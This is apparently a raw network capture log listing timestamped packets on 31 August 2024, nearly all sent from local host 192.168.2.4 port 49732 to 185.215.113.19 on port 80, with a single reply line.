Aug 31, 2024 22:41:57.692404032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692421913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692451000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692472935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692495108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692523003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692544937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692570925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692594051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692615986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692641020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692667961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692692041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692718029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692739010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692768097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692786932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692811966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692836046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692861080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692887068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692903996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692929983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692956924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.692980051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693005085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693031073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693054914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693080902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693101883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693131924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693156004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693178892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693203926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693226099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693249941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693272114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693298101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693320990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693348885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693372011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693397045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693420887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693444967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693468094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693494081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693528891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693547010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693579912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693603992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693629026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693651915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693676949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693698883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693721056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693738937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693761110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693782091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693804026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693831921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693849087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693873882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693897009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693922043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693942070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693958998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.693980932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694000959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694026947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694046021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694066048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694089890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694112062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694134951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694159031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694180012 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694205046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694226980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694248915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694269896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694291115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694312096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694329977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694355965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694375992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694395065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694416046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694437981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694463015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694488049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694513083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694530010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694555998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694578886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694597960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694614887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694641113 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694660902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694683075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694704056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694725037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694746971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694770098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694798946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694822073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694844007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694866896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694890022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694904089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694930077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694952011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694972038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.694993973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695009947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695034981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695056915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695069075 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.695077896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695565939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695591927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695616007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695636988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695660114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695683956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695698023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695722103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695744038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695765972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695785999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695807934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695832014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695852041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695873022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695895910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695919991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695941925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695964098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.695990086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696011066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696037054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696062088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696079016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696100950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696125984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696146965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696171045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696194887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696216106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696238995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696264029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696278095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696306944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696327925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696350098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696372986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696393967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696413994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696435928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696454048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696479082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696499109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696523905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696546078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696561098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696593046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696614027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696634054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696657896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696680069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696703911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696723938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696748972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696763992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696789026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696808100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696834087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696896076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696919918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696939945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696966887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.696989059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697011948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697027922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697056055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697077036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697097063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697118998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697135925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697161913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697185993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697211027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697233915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697256088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697273016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697298050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697320938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697345972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697365999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697387934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697407961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697432041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697452068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697474003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697501898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697519064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697540998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697565079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697586060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697609901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697630882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697654963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697675943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697699070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697721004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697742939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697760105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697784901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697812080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697824955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697849989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697870970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697896004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697916985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697942019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697964907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.697983027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698008060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698028088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698050976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698072910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698085070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698116064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698142052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698160887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698189020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698199987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698225975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698246956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698268890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698296070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698308945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698335886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698358059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698376894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698399067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698417902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698443890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698462963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698488951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698513985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698534966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698555946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698575020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698601961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698621988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698642015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698658943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698683023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698703051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698724985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698749065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698766947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698788881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698808908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698829889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698844910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698875904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698892117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698919058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698940992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.698983908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699013948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699125051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699143887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699165106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699189901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699206114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699222088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699253082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699263096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699299097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699321985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699340105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699352980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699378014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699394941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699424028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699431896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699455976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699474096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699491978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699511051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699532986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699547052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699569941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699592113 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699610949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699632883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699650049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699673891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699687958 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699733973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.699981928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700028896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700028896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700064898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700072050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700093985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700113058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700135946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700160027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700181007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700200081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700218916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700234890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700259924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700275898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700315952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700315952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700331926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700349092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700368881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700391054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700417042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700436115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700499058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700519085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700546026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700573921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700599909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700623035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700645924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.700726032 CEST	49732	80	192.168.2.4	185.215.113.19
